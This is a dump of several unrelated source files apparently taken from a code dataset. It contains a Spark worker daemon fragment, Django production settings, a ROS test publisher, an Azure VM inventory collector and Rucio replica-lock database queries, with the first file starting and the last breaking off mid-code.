                # subscript itself raises TypeError — confirm the intended
                # interpreter for this file.
                if ex[0] == EINTR:
                    continue
                else:
                    raise

            if 0 in ready_fds:
                # The JVM writes a worker pid on stdin to request its death.
                try:
                    worker_pid = read_int(stdin_bin)
                except EOFError:
                    # Spark told us to exit by closing stdin
                    shutdown(0)
                try:
                    os.kill(worker_pid, signal.SIGKILL)
                except OSError:
                    pass  # process already died

            if listen_sock in ready_fds:
                try:
                    sock, _ = listen_sock.accept()
                except OSError as e:
                    if e.errno == EINTR:
                        continue
                    raise

                # Launch a worker process
                try:
                    pid = os.fork()
                except OSError as e:
                    if e.errno in (EAGAIN, EINTR):
                        # Transient fork failure: back off once and retry.
                        time.sleep(1)
                        pid = os.fork()  # error here will shutdown daemon
                    else:
                        outfile = sock.makefile(mode='wb')
                        write_int(e.errno, outfile)  # Signal that the fork failed
                        outfile.flush()
                        outfile.close()
                        sock.close()
                        continue

                if pid == 0:
                    # in child process
                    listen_sock.close()
                    try:
                        # Acknowledge that the fork was successful
                        outfile = sock.makefile(mode="wb")
                        write_int(os.getpid(), outfile)
                        outfile.flush()
                        outfile.close()
                        authenticated = False
                        # Serve tasks on this socket; loop only if worker
                        # reuse is enabled and the last task succeeded.
                        while True:
                            code = worker(sock, authenticated)
                            if code == 0:
                                authenticated = True
                            if not reuse or code:
                                # wait for closing
                                try:
                                    while sock.recv(1024):
                                        pass
                                except Exception:
                                    pass
                                break
                            gc.collect()
                    except:
                        traceback.print_exc()
                        os._exit(1)
                    else:
                        os._exit(0)
                else:
                    sock.close()

    finally:
        shutdown(1)
# Entry point: the daemon is launched as a script by the JVM side.
if __name__ == '__main__':
    manager()
| 34.341837 | 88 | 0.548507 |
f4f36ba0faebfdc15a4b09d0663970496949e0c7 | 8,070 | py | Python | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | null | null | null | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | null | null | null | config/settings/production.py | dhavalsavalia/university_dost | ef6c78239dd648542b68b610528e0b9a23a94295 | [
"MIT"
] | 1 | 2020-06-05T09:29:09.000Z | 2020-06-05T09:29:09.000Z | import logging
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from .base import * # noqa
from .base import env
# Production settings: every secret/tunable below is read from environment
# variables through django-environ's env() (imported from .base).
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["universitydost.in"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL")  # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True  # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60)  # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
    "default": {
        "BACKEND": "django_redis.cache.RedisCache",
        "LOCATION": env("REDIS_URL"),
        "OPTIONS": {
            "CLIENT_CLASS": "django_redis.client.DefaultClient",
            # Mimicing memcache behavior: treat the cache as best-effort and
            # never let a Redis outage take the site down.
            # http://jazzband.github.io/django-redis/latest/#_memcached_exceptions_behavior
            "IGNORE_EXCEPTIONS": True,
        },
    }
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
    "DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
    "DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"]  # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_ENDPOINT_URL = env("DJANGO_AWS_S3_ENDPOINT_URL")
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7  # one week, in seconds
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
    "CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
# Static assets are served by WhiteNoise with compressed, content-hashed names.
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "university_dost.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
# Wrap the loaders in the cached loader: templates do not change at runtime
# in production, so compile each one only once.
TEMPLATES[-1]["OPTIONS"]["loaders"] = [  # type: ignore[index] # noqa F405
    (
        "django.template.loaders.cached.Loader",
        [
            "django.template.loaders.filesystem.Loader",
            "django.template.loaders.app_directories.Loader",
        ],
    )
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
    "DJANGO_DEFAULT_FROM_EMAIL", default="University Dost <noreply@universitydost.in>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default="[University Dost]")
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"]  # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
    "MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
    "MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
    "MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# Everything goes to stdout (console handler); Sentry picks errors up via the
# LoggingIntegration configured below, not via a logging handler here.
LOGGING = {
    "version": 1,
    "disable_existing_loggers": True,
    "formatters": {
        "verbose": {
            "format": "%(levelname)s %(asctime)s %(module)s "
            "%(process)d %(thread)d %(message)s"
        }
    },
    "handlers": {
        "console": {
            "level": "DEBUG",
            "class": "logging.StreamHandler",
            "formatter": "verbose",
        }
    },
    "root": {"level": "INFO", "handlers": ["console"]},
    "loggers": {
        "django.db.backends": {
            "level": "ERROR",
            "handlers": ["console"],
            "propagate": False,
        },
        # Errors logged by the SDK itself
        "sentry_sdk": {"level": "ERROR", "handlers": ["console"], "propagate": False},
        "django.security.DisallowedHost": {
            "level": "ERROR",
            "handlers": ["console"],
            "propagate": False,
        },
    },
}
# Sentry
# ------------------------------------------------------------------------------
SENTRY_DSN = env("SENTRY_DSN")
SENTRY_LOG_LEVEL = env.int("DJANGO_SENTRY_LOG_LEVEL", logging.INFO)
sentry_logging = LoggingIntegration(
    level=SENTRY_LOG_LEVEL,  # Capture info and above as breadcrumbs
    event_level=logging.ERROR,  # Send errors as events
)
sentry_sdk.init(
    dsn=SENTRY_DSN,
    integrations=[sentry_logging, DjangoIntegration(), CeleryIntegration()],
)
# Your stuff...
# ------------------------------------------------------------------------------
| 41.597938 | 91 | 0.627138 |
b3d230e85af6dae941f333ca20af640328777574 | 530 | py | Python | src/test/send_point.py | yinzixuan126/rviz | c228cf5e03ef44c7581f449a34845722fe10f9a3 | [
"MIT"
] | 9 | 2017-12-17T07:43:15.000Z | 2021-10-10T15:03:39.000Z | melodic/src/rviz/src/test/send_point.py | disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA | 3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0 | [
"BSD-3-Clause"
] | null | null | null | melodic/src/rviz/src/test/send_point.py | disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA | 3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0 | [
"BSD-3-Clause"
] | 6 | 2016-01-27T03:40:58.000Z | 2021-06-15T08:12:14.000Z | #!/usr/bin/env python
import roslib; roslib.load_manifest('rviz')
from geometry_msgs.msg import PointStamped
import math
import rospy
# Test script: publish a PointStamped that travels around a circle of
# radius 5 in the /base_link frame, so rviz's point display can be exercised.
topic = 'test_point'
# NOTE(review): Publisher() is called without queue_size; newer rospy
# releases warn about this -- confirm against the target ROS version.
publisher = rospy.Publisher(topic, PointStamped)
rospy.init_node('send_point')
t = 0
while not rospy.is_shutdown():
    p = PointStamped()
    p.header.frame_id = "/base_link"
    p.header.stamp = rospy.Time.now()
    r = 5.0
    # Point on a circle of radius r; t advances 0.1 rad per message (~33 Hz).
    p.point.x = r * math.cos( t )
    p.point.y = r * math.sin( t )
    p.point.z = 0
    publisher.publish( p )
    t += .1
    rospy.sleep(0.03)
| 17.666667 | 48 | 0.660377 |
00e1af432db3abc6bde4a12139f65d7a1a7b22e0 | 11,635 | py | Python | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | src/spaceone/inventory/manager/collector_manager.py | jihyungSong/plugin-azure-vm-inven-collector | 9ce42c67ea10aedeffdc457657de7c13f1b31617 | [
"Apache-2.0"
] | null | null | null | __all__ = ['CollectorManager']
import logging
from spaceone.core.manager import BaseManager
from spaceone.inventory.connector import AzureVMConnector
from spaceone.inventory.manager.azure import AzureDiskManager, AzureLoadBalancerManager, \
AzureNetworkSecurityGroupManager, AzureNICManager, AzureResourceGroupManager, AzureVmManager, \
AzureVMScaleSetManager, AzureVNetManager
from spaceone.inventory.manager.metadata.metadata_manager import MetadataManager
from spaceone.inventory.model.server import Server, ReferenceModel
from spaceone.inventory.model.region import Region
from spaceone.inventory.model.subscription import Subscription
from spaceone.inventory.model.cloud_service_type import CloudServiceType
from spaceone.inventory.model.monitor import Monitor
from spaceone.inventory.model.resource import ErrorResourceResponse, ServerResourceResponse
from spaceone.inventory.model.metadata.metadata import CloudServiceTypeMetadata
from spaceone.inventory.model.metadata.metadata_dynamic_field import TextDyField
from spaceone.inventory.conf.cloud_service_conf import *
from spaceone.core.utils import *
# Module-level logger for this collector plugin.
_LOGGER = logging.getLogger(__name__)
class CollectorManager(BaseManager):
    """Collect Azure VM inventory and convert it to SpaceONE resource responses.

    Each public method obtains a fresh ``AzureVMConnector`` through the
    service locator and connects it with the credentials found in
    ``params['secret_data']``.
    """

    def __init__(self, transaction):
        super().__init__(transaction)

    def verify(self, options, secret_data):
        """Check the connection to Azure with the given credentials.

        :param options: plugin options (passed through to the connector)
        :param secret_data: Azure credentials
        :return: connection state (ACTIVE/UNKNOWN)
        """
        azure_vm_connector = self.locator.get_connector('AzureVMConnector')
        r = azure_vm_connector.verify(options, secret_data)
        # ACTIVE/UNKNOWN
        return r

    def list_all_resource_groups(self, params):
        """Return every resource group of the subscription in ``params['secret_data']``."""
        azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
        azure_vm_connector.set_connect(params['secret_data'])
        rg_manager: AzureResourceGroupManager = AzureResourceGroupManager(params, azure_vm_connector=azure_vm_connector)
        return rg_manager.list_all_resource_groups()

    def list_vms(self, params, resource_group_name):
        """List the VMs of one resource group.

        If ``params['secret_data']['region_name']`` is set, only VMs located
        in that region are returned.
        """
        azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
        azure_vm_connector.set_connect(params['secret_data'])
        vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
        vms = vm_manager.list_vms(resource_group_name)
        region_name = params['secret_data'].get('region_name')
        if region_name:
            return [vm for vm in vms if vm.location == region_name]
        return vms

    def list_all_vms(self, params):
        """List every VM of the subscription, across all resource groups."""
        azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
        azure_vm_connector.set_connect(params['secret_data'])
        vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
        return vm_manager.list_all_vms()

    def list_all_resources(self, params):
        """Collect every VM of one resource group with its related resources.

        Related resources (disks, NICs, load balancers, NSGs, VNet/subnet) are
        fetched once per resource group and matched to each VM.

        :param params: dict with keys 'secret_data', 'resource_group', 'vms'
        :return: (list of ServerResourceResponse, list of ErrorResourceResponse)
        """
        servers = []
        errors = []

        azure_vm_connector: AzureVMConnector = self.locator.get_connector('AzureVMConnector')
        azure_vm_connector.set_connect(params['secret_data'])

        resource_group = params['resource_group']
        resource_group_name = params['resource_group'].name
        subscription = params['secret_data'].get('subscription_id')

        # One helper manager per Azure resource type.
        # NOTE: a former annotation-only statement
        # ``resource_group_manager: AzureResourceGroupManager(...)`` was removed:
        # per PEP 526 local annotations are never evaluated, so it neither
        # instantiated the manager nor bound the name, and it was unused.
        # TODO: VM scale set collection (AzureVMScaleSetManager) is not implemented yet.
        vm_manager: AzureVmManager = AzureVmManager(params, azure_vm_connector=azure_vm_connector)
        disk_manager: AzureDiskManager = AzureDiskManager(params, azure_vm_connector=azure_vm_connector)
        load_balancer_manager: AzureLoadBalancerManager = \
            AzureLoadBalancerManager(params, azure_vm_connector=azure_vm_connector)
        network_security_group_manager: AzureNetworkSecurityGroupManager = \
            AzureNetworkSecurityGroupManager(params, azure_vm_connector=azure_vm_connector)
        nic_manager: AzureNICManager = AzureNICManager(params, azure_vm_connector=azure_vm_connector)
        vnet_manager: AzureVNetManager = AzureVNetManager(params, azure_vm_connector=azure_vm_connector)
        meta_manager: MetadataManager = MetadataManager()

        vms = params['vms']

        # Fetch shared, per-resource-group collections once.
        load_balancers = list(azure_vm_connector.list_load_balancers(resource_group_name))
        network_security_groups = list(azure_vm_connector.list_network_security_groups(resource_group_name))
        network_interfaces = list(azure_vm_connector.list_network_interfaces(resource_group_name))
        list_disks = list(azure_vm_connector.list_disk())
        public_ip_addresses = list(azure_vm_connector.list_public_ip_address(resource_group_name))
        virtual_networks = list(azure_vm_connector.list_virtual_network(resource_group_name))

        subscription_info = azure_vm_connector.get_subscription_info(subscription)
        subscription_data = {
            'subscription_id': subscription_info.subscription_id,
            'subscription_name': subscription_info.display_name,
            'tenant_id': subscription_info.tenant_id
        }
        # Shared cache of VM size lookups, filled by get_vm_info.
        vm_sizes = []

        for vm in vms:
            try:
                vnet_data = None
                subnet_data = None
                lb_vos = []
                disk_vos = disk_manager.get_disk_info(vm, list_disks)
                nic_vos, primary_ip = nic_manager.get_nic_info(vm, network_interfaces, public_ip_addresses,
                                                               virtual_networks)
                server_data = vm_manager.get_vm_info(vm, disk_vos, nic_vos, resource_group, subscription,
                                                     network_security_groups, vm_sizes, primary_ip)
                if load_balancers is not None:
                    lb_vos = load_balancer_manager.get_load_balancer_info(vm, load_balancers, public_ip_addresses)
                nsg_vos = network_security_group_manager.get_network_security_group_info(vm, network_security_groups,
                                                                                        network_interfaces)
                # Resolve VNet/subnet through the VM's first NIC.
                nic_name = vm.network_profile.network_interfaces[0].id.split('/')[-1]
                if nic_name is not None:
                    vnet_subnet_dict = vnet_manager.get_vnet_subnet_info(nic_name, network_interfaces, virtual_networks)
                    if vnet_subnet_dict.get('vnet_info'):
                        vnet_data = vnet_subnet_dict['vnet_info']
                    if vnet_subnet_dict.get('subnet_info'):
                        subnet_data = vnet_subnet_dict['subnet_info']

                server_data.update({
                    'tags': self.get_tags(vm.tags)
                })
                server_data['data'].update({
                    'load_balancer': lb_vos,
                    'security_group': nsg_vos,
                    'vnet': vnet_data,
                    'subnet': subnet_data,
                    'subscription': Subscription(subscription_data, strict=False),
                    'azure_monitor': Monitor({
                        'resource_id': f'subscriptions/{subscription}/resourceGroups/{resource_group_name}/providers/Microsoft.Compute/virtualMachines/{server_data["name"]}'
                    }, strict=False)
                })
                server_data['data']['compute']['account'] = subscription_data['subscription_name']
                server_data.update({
                    '_metadata': meta_manager.get_server_metadata(),
                    'reference': ReferenceModel({
                        'resource_id': server_data['data']['compute']['instance_id'],
                        'external_link': f"https://portal.azure.com/#@.onmicrosoft.com/resource/subscriptions/{subscription}/resourceGroups/{resource_group_name}/providers/Microsoft.Compute/virtualMachines/{server_data['data']['compute']['instance_name']}/overview"
                    }),
                    'account': subscription_data['subscription_id'],
                    'instance_type': server_data['data']['compute']['instance_type'],
                    'launched_at': datetime_to_iso8601(server_data['data']['compute']['launched_at'])
                })
                server_resource = Server(server_data, strict=False)
                servers.append(ServerResourceResponse({'resource': server_resource}))
            except Exception as e:
                # Collect per-VM failures instead of aborting the whole group.
                _LOGGER.error(f'[list_instances] [{vm.id}] {e}')
                # NOTE(review): exceptions are never dict instances in Python 3;
                # this branch looks unreachable but is kept for compatibility
                # with the error convention used elsewhere in this plugin.
                if type(e) is dict:
                    error_resource_response = ErrorResourceResponse({'message': json.dumps(e)})
                else:
                    error_resource_response = ErrorResourceResponse({'message': str(e), 'resource': {'resource_id': vm.id}})
                errors.append(error_resource_response)

        return servers, errors

    def list_resources(self, params):
        """Collect all resources of one resource group, never raising.

        :param params: dict with keys 'secret_data', 'resource_group', 'vms'
        :return: list of resource responses (successes and errors mixed)
        """
        start_time = time.time()
        total_resources = []

        try:
            resources, error_resources = self.list_all_resources(params)
            total_resources.extend(resources)
            total_resources.extend(error_resources)
            _LOGGER.debug(f'[{params["resource_group"].name}] Finished {time.time() - start_time} Seconds')
            return total_resources
        except Exception as e:
            _LOGGER.debug(f'[list_resources]: {params["resource_group"].name}] : {e}')
            if type(e) is dict:
                error_resource_response = ErrorResourceResponse({'message': json.dumps(e)})
            else:
                error_resource_response = ErrorResourceResponse({'message': str(e)})
            total_resources.append(error_resource_response)
            return total_resources

    @staticmethod
    def list_cloud_service_types():
        """Return the CloudServiceType entry describing this collector's resources."""
        meta_manager: MetadataManager = MetadataManager()
        cloud_service_type = {
            '_metadata': meta_manager.get_cloud_service_type_metadata(),
            'tags': {
                'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/azure-vm.svg',
            }
        }
        return [CloudServiceType(cloud_service_type, strict=False)]

    @staticmethod
    def get_region_from_result(result):
        """Map a collected resource to a Region model via REGION_INFO.

        :return: Region, or None when the availability zone is unknown.
        """
        match_region_info = REGION_INFO.get(getattr(result.data.compute, 'az', None))

        if match_region_info:
            region_info = match_region_info.copy()
            region_info.update({
                'region_code': result.region_code
            })
            return Region(region_info, strict=False)

        return None

    @staticmethod
    def get_tags(tags):
        """Convert an Azure tag mapping into a list of {'key', 'value'} dicts.

        :param tags: mapping of tag name to value, or None
        :return: list of dicts; empty when tags is falsy
        """
        tags_result = []
        if tags:
            for k, v in tags.items():
                tags_result.append({
                    'key': k,
                    'value': v
                })
        return tags_result
| 45.272374 | 265 | 0.657585 |
3a1cc2afac52ad9d8694062b605bdd286ef3411a | 20,725 | py | Python | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | lib/rucio/core/lock.py | maatthias/rucio-old | 8600cdc0838886a2f076f2f88850770877fc505f | [
"Apache-2.0"
] | null | null | null | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Martin Barisits, <martin.barisits@cern.ch>, 2013-2019
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2014
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2014-2018
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2014-2018
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2014-2018
#
# PY3K COMPATIBLE
import logging
import sys
from datetime import datetime
from sqlalchemy.exc import DatabaseError
from sqlalchemy.sql.expression import and_, or_
import rucio.core.rule
import rucio.core.did
from rucio.common.config import config_get
from rucio.common.exception import RSENotFound
from rucio.core.lifetime_exception import define_eol
from rucio.core.rse import get_rse_name, get_rse_id
from rucio.db.sqla import models
from rucio.db.sqla.constants import LockState, RuleState, RuleGrouping, DIDType, RuleNotification
from rucio.db.sqla.session import read_session, transactional_session, stream_session
# Configure root logging to stdout; level comes from the 'common.loglevel'
# config option (default DEBUG), tab-separated fields for easy parsing.
logging.basicConfig(stream=sys.stdout,
                    level=getattr(logging,
                                  config_get('common', 'loglevel',
                                             raise_exception=False,
                                             default='DEBUG').upper()),
                    format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
@stream_session
def get_dataset_locks(scope, name, session=None):
    """
    Get the dataset locks of a dataset.

    :param scope:    Scope of the dataset.
    :param name:     Name of the dataset.
    :param session:  The db session.
    :return:         Generator of dicts with keys rse_id, rse, scope, name,
                     rule_id, account, state, length, bytes, accessed_at.
    """

    query = session.query(models.DatasetLock.rse_id,
                          models.DatasetLock.scope,
                          models.DatasetLock.name,
                          models.DatasetLock.rule_id,
                          models.DatasetLock.account,
                          models.DatasetLock.state,
                          models.DatasetLock.length,
                          models.DatasetLock.bytes,
                          models.DatasetLock.accessed_at).filter_by(scope=scope, name=name)

    # Cache rse_id -> RSE name resolutions to avoid one DB lookup per lock.
    # (Fix: the cache was previously bound to the name 'dict', and the loop
    # variable to 'bytes', shadowing the builtins.)
    rse_names = {}
    for rse_id, scope, name, rule_id, account, state, length, bytes_, accessed_at in query.yield_per(500):
        if rse_id not in rse_names:
            rse_names[rse_id] = get_rse_name(rse_id, session=session)
        yield {'rse_id': rse_id,
               'rse': rse_names[rse_id],
               'scope': scope,
               'name': name,
               'rule_id': rule_id,
               'account': account,
               'state': state,
               'length': length,
               'bytes': bytes_,
               'accessed_at': accessed_at}
@stream_session
def get_dataset_locks_by_rse_id(rse_id, session=None):
    """
    Get the dataset locks of an RSE.

    :param rse_id:   RSE id to get the locks from.
    :param session:  The db session.
    :return:         Generator of dicts with keys rse_id, rse, scope, name,
                     rule_id, account, state, length, bytes, accessed_at.
    """
    query = session.query(models.DatasetLock.rse_id,
                          models.DatasetLock.scope,
                          models.DatasetLock.name,
                          models.DatasetLock.rule_id,
                          models.DatasetLock.account,
                          models.DatasetLock.state,
                          models.DatasetLock.length,
                          models.DatasetLock.bytes,
                          models.DatasetLock.accessed_at).filter_by(rse_id=rse_id).\
        with_hint(models.DatasetLock, "index(DATASET_LOCKS DATASET_LOCKS_RSE_ID_IDX)", 'oracle')

    # Cache rse_id -> RSE name resolutions to avoid one DB lookup per lock.
    # (Fix: the cache was previously bound to the name 'dict', and the loop
    # variable to 'bytes', shadowing the builtins.)
    rse_names = {}
    for rse_id, scope, name, rule_id, account, state, length, bytes_, accessed_at in query.yield_per(500):
        if rse_id not in rse_names:
            rse_names[rse_id] = get_rse_name(rse_id, session=session)
        yield {'rse_id': rse_id,
               'rse': rse_names[rse_id],
               'scope': scope,
               'name': name,
               'rule_id': rule_id,
               'account': account,
               'state': state,
               'length': length,
               'bytes': bytes_,
               'accessed_at': accessed_at}
@read_session
def get_replica_locks(scope, name, nowait=False, restrict_rses=None, session=None):
    """
    Fetch the active replica locks of a single file, selecting them FOR UPDATE.

    :param scope:          Scope of the did.
    :param name:           Name of the did.
    :param nowait:         Nowait parameter for the FOR UPDATE statement.
    :param restrict_rses:  Possible RSE_ids to filter on.
    :param session:        The db session.
    :return:               List of ReplicaLock rows.
    :raises:               NoResultFound
    """

    query = session.query(models.ReplicaLock).filter_by(scope=scope, name=name)
    if restrict_rses is not None:
        # Narrow the result down to the requested RSEs, if any were given.
        rse_filters = [models.ReplicaLock.rse_id == rse_id for rse_id in restrict_rses]
        if rse_filters:
            query = query.filter(or_(*rse_filters))

    return query.with_for_update(nowait=nowait).all()
@read_session
def get_replica_locks_for_rule_id(rule_id, session=None):
    """
    Return the active replica locks attached to one rule.

    :param rule_id:  Filter on rule_id.
    :param session:  The db session.
    :return:         List of dicts {'scope':, 'name':, 'rse_id':, 'rse':, 'state':, 'rule_id':}
    :raises:         NoResultFound
    """

    query = session.query(models.ReplicaLock).filter_by(rule_id=rule_id)
    return [{'scope': lock.scope,
             'name': lock.name,
             'rse_id': lock.rse_id,
             'rse': get_rse_name(rse_id=lock.rse_id, session=session),
             'state': lock.state,
             'rule_id': lock.rule_id} for lock in query]
@read_session
def get_replica_locks_for_rule_id_per_rse(rule_id, session=None):
    """
    Return the distinct RSEs holding active replica locks for one rule.

    :param rule_id:  Filter on rule_id.
    :param session:  The db session.
    :return:         List of dicts {'rse_id':, 'rse':}
    :raises:         NoResultFound
    """

    query = session.query(models.ReplicaLock.rse_id).filter_by(rule_id=rule_id).group_by(models.ReplicaLock.rse_id)
    return [{'rse_id': entry.rse_id,
             'rse': get_rse_name(rse_id=entry.rse_id, session=session)} for entry in query]
@read_session
def get_files_and_replica_locks_of_dataset(scope, name, nowait=False, restrict_rses=None, only_stuck=False, session=None):
    """
    Get all the files of a dataset and, if existing, all locks of the file.

    :param scope:          Scope of the dataset
    :param name:           Name of the datset
    :param nowait:         Nowait parameter for the FOR UPDATE statement
    :param restrict_rses:  Possible RSE_ids to filter on.
    :param only_stuck:     If true, only get STUCK locks.
    :param session:        The db session.
    :return:               Dictionary with keys: (scope, name)
                           and as value: [LockObject]
    :raises:               NoResultFound
    """
    # Maps (file scope, file name) -> list of its ReplicaLock rows.
    locks = {}
    if session.bind.dialect.name == 'postgresql':
        # PostgreSQL branch: files without locks are pre-seeded with empty
        # lists by a first content query, and the lock query then uses a
        # plain (inner) join -- presumably because FOR UPDATE cannot be
        # applied to the nullable side of an outer join in PostgreSQL;
        # TODO confirm against the supported PostgreSQL versions.
        content_query = session.query(models.DataIdentifierAssociation.child_scope,
                                      models.DataIdentifierAssociation.child_name).\
            with_hint(models.DataIdentifierAssociation,
                      "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)",
                      'oracle').\
            filter(models.DataIdentifierAssociation.scope == scope,
                   models.DataIdentifierAssociation.name == name)

        for child_scope, child_name in content_query.yield_per(1000):
            locks[(child_scope, child_name)] = []
        query = session.query(models.DataIdentifierAssociation.child_scope,
                              models.DataIdentifierAssociation.child_name,
                              models.ReplicaLock).\
            with_hint(models.DataIdentifierAssociation,
                      "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)",
                      'oracle').\
            filter(and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
                        models.DataIdentifierAssociation.child_name == models.ReplicaLock.name))\
            .filter(models.DataIdentifierAssociation.scope == scope,
                    models.DataIdentifierAssociation.name == name)

